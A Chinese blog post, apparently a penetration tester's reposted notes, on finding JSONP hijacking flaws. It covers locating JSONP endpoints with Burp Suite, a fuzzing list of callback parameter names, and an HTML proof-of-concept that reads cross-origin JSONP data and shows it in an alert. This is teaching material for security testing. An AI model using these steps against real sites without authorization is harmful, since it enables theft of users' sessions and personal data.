内容简介:jsop,其实很早以前就被人玩烂了,但是我一直没有重视,感觉顶多泄露点个人信息,直到这个星期,挖到一个jsonp泄露session的漏洞这个星期测了个在线教育的站,域名有很多个,不同域名下的访问就会产生一个跨域的问题,跨域的解决方案一般有三种 CORS、postMessage和jsonp。这里jsonp的原理就不细讲了。那个网站登陆页面在域名A,登陆认证的后端在域名B,当登陆成功之后域名A有时就会请求域名B接口获取session
jsop,其实很早以前就被人玩烂了,但是我一直没有重视,感觉顶多泄露点个人信息,直到这个星期,挖到一个jsonp泄露session的漏洞
这个星期测了个在线教育的站,域名有很多个,不同域名下的访问就会产生一个跨域的问题,跨域的解决方案一般有三种 CORS、postMessage和jsonp。这里jsonp的原理就不细讲了。
那个网站登陆页面在域名A,登陆认证的后端在域名B,当登陆成功之后域名A有时就会请求域名B接口获取session
其实原理没什么好讲的,讲这个主要是提醒自己不要小看一些漏洞,像jsonp劫持最多的危害就是泄露敏感信息,比如用户信息、token之类的。
jsonp原理
懒得写了,先占个坑以后补
挖掘jsonp劫持漏洞
有很多 程序员 在写接口的时候都会顺手写个jsonp的接口,可以先开着bp看一下功能点,看看是否有地方用了jsonp
快速寻找jsonp的接口
开着bp逛一圈,一般有jsonp的数据传输会在mimetype中显示为script,通过 排序 可以快速得找到
callback的值,就是jsonp回传回来的函数名
然后只要查看传输的数据中是否有敏感信息就可以了
寻找敏感的json数据
如果jsonp的接口没有敏感信息传输,json数据包中恰好有的话,我们可以尝试一下程序员是否有开发jsonp的格式,大多数程序员喜欢把jsonp的回传参数命名为callback
当然还有其他的可能,贴一份字典,直接用Intruder Fuzz一下试试:
callback=attack cb=attack call=attack jsonp=attack jsonpcallback=attack jsonpcb=attack json=attack jsoncallback=attack jcb=attack
漏洞证明
http://47.98.109.141:5000/interface?callback=attack
返回的数据为
attack({"value":1})
使用下面的poc
jsonp 填写回调参数的名字
jsonpcallback就是回调参数的值
alert的地方根据需要更改取值
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>jsonp劫持</title>
<script src="js/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$.ajax({
url:"http://xxx.com/interface",
dataType:"jsonp",
jsonp:"callback",
jsonpCallback:"attack",
success:function (data) {
alert(data.value)
}
})
</script>
</body>
</html>
如果能正常取到值,就说明漏洞存在了
漏洞利用的话就具体情况具体分析了,这里就不赘述了
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Head First Web Design
Ethan Watrall、Jeff Siarto / O’Reilly Media, Inc. / 2009-01-02 / USD 49.99
Want to know how to make your pages look beautiful, communicate your message effectively, guide visitors through your website with ease, and get everything approved by the accessibility and usability ......一起来看看 《Head First Web Design》 这本书的介绍吧!
